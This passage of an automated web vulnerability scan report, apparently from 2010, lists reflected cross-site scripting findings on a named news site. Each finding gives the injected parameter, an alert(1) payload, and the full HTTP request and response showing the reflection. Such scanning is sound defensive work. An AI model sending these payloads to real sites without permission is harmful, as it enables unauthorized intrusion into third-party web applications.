<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... t language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=/news/internet/policy7e9ab'-alert(1)-'228dc317a35/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=354053953;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa3f5"><a%20b%3dc>a23bc44272e was submitted in the REST URL parameter 3. This input was echoed as aa3f5"><a b=c>a23bc44272e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/internet/policyaa3f5"><a%20b%3dc>a23bc44272e/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=UNV33D2SOQRMRQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32757
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=/news/internet/policyaa3f5"><a b=c>a23bc44272e/showArticle;kvarticleid=;kvauthor=;loc=300;grp=944805944" target="_blank"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b921"><script>alert(1)</script>0efdcc57e3e was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/policy/showArticle.jhtml?articleID=2159008027b921"><script>alert(1)</script>0efdcc57e3e HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:43 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:43 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=V5Q21WN3IHVJ1QE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 34033
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/internet/policy/showArticle.jhtml?articleID=2159008027b921"><script>alert(1)</script>0efdcc57e3e"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f5d1'%3balert(1)//14c6e9df0d9 was submitted in the articleID parameter. This input was echoed as 8f5d1';alert(1)//14c6e9df0d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/policy/showArticle.jhtml?articleID=2159008028f5d1'%3balert(1)//14c6e9df0d9 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=YX5YPHO4TKQC5QE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33620
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=2159008028f5d1';alert(1)//14c6e9df0d9+/news/internet/policy/showArticle/dhandler;kvarticleid=2159008028f5d1';alert(1)//14c6e9df0d9;kvauthor=;loc=100;target=_blank;grp=924067111;misc='+new Date().getTime()+'"> ...[SNIP]...
1.45. http://www.informationweek.com/news/internet/policy/showArticle.jhtml [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.informationweek.com
Path: /news/internet/policy/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5697d"><script>alert(1)</script>e49d0cc96c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/policy/showArticle.jhtml?articleID=215900802&5697d"><script>alert(1)</script>e49d0cc96c3=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:15:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=W3ICUW4BFHK5DQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 81967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/internet/policy/showArticle.jhtml?articleID=215900802&5697d"><script>alert(1)</script>e49d0cc96c3=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e35a"><script>alert(1)</script>cdc66f6af3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news4e35a"><script>alert(1)</script>cdc66f6af3c/internet/security/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:23 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:23 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=XFBFROKJFGZPJQE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32857
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=/news4e35a"><script>alert(1)</script>cdc66f6af3c/internet/s;kvarticleid=;kvauthor=;loc=300;grp=147213812" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fdce'-alert(1)-'02711aaebeb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news1fdce'-alert(1)-'02711aaebeb/internet/security/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:25 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:25 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=U2TLDNWT3TPF3QE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32807
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=/news1fdce'-alert(1)-'02711aaebeb/internet/security/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=599486144;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebaf4'-alert(1)-'f4f3b6f3e1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internetebaf4'-alert(1)-'f4f3b6f3e1d/security/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:27 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:27 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=4XK0R0JDGOMXVQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32631
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news/internetebaf4'-alert(1)-'f4f3b6f3e1d/security/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=897474167;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f0b"><script>alert(1)</script>7d67752ca8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet19f0b"><script>alert(1)</script>7d67752ca8/security/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=F0QULAYVNFOSVQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32667
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news/internet19f0b"><script>alert(1)</script>7d67752ca8/se;kvarticleid=;kvauthor=;loc=300;grp=91262792" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1330"><a%20b%3dc>d382df97e96 was submitted in the REST URL parameter 3. This input was echoed as f1330"><a b=c>d382df97e96 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/internet/securityf1330"><a%20b%3dc>d382df97e96/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=BPI4ITHG2UAOZQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32809
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=/news/internet/securityf1330"><a b=c>d382df97e96/showArticle;kvarticleid=;kvauthor=;loc=300;grp=928838864" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d089b'-alert(1)-'300de3d8ef4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/securityd089b'-alert(1)-'300de3d8ef4/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=YMOEN2YS4YZKPQE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32771
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... nguage="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=/news/internet/securityd089b'-alert(1)-'300de3d8ef4/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=51648980;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febdf"><script>alert(1)</script>1494b2e1781 was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/security/showArticle.jhtml?articleID=210200864febdf"><script>alert(1)</script>1494b2e1781 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=LDPQ53XSQUTNXQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 34101
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=210200864febdf"><script>alert(1)</script>1494b2e1781"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6238c'%3balert(1)//7de85999a0 was submitted in the articleID parameter. This input was echoed as 6238c';alert(1)//7de85999a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/security/showArticle.jhtml?articleID=2102008646238c'%3balert(1)//7de85999a0 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=NALYQ3FZOGA3JQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33649
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=2102008646238c';alert(1)//7de85999a0+/news/internet/security/showArticle/dhandler;kvarticleid=2102008646238c';alert(1)//7de85999a0;kvauthor=;loc=100;target=_blank;grp=385233938;misc='+new Date().getTime()+'"> ...[SNIP]...
1.54. http://www.informationweek.com/news/internet/security/showArticle.jhtml [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.informationweek.com
Path: /news/internet/security/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b45d3"><script>alert(1)</script>d121f2badb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/security/showArticle.jhtml?articleID=210200864&b45d3"><script>alert(1)</script>d121f2badb5=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:15:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=E1JLJYKE0BVVLQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 81943
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/internet/security/showArticle.jhtml?articleID=210200864&b45d3"><script>alert(1)</script>d121f2badb5=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fadc"><script>alert(1)</script>e5b3b34a7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news1fadc"><script>alert(1)</script>e5b3b34a7c/internet/social_network/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:23 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:23 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=REZD3IBKYH1F1QE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32687
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=/news1fadc"><script>alert(1)</script>e5b3b34a7c/internet/so;kvarticleid=;kvauthor=;loc=300;grp=110855041" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fc45'-alert(1)-'3a198292b56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2fc45'-alert(1)-'3a198292b56/internet/social_network/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:25 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:25 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=02ILPTLOVT5TBQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32639
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=/news2fc45'-alert(1)-'3a198292b56/internet/social_network/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=622571078;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97dda'-alert(1)-'f5d49875dd7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet97dda'-alert(1)-'f5d49875dd7/social_network/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:27 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:27 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=O5FAGBDRACS1VQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32160
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/internet97dda'-alert(1)-'f5d49875dd7/social_network/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=910170881;misc='+new Date().getTime()+'"> ...[SNIP]...
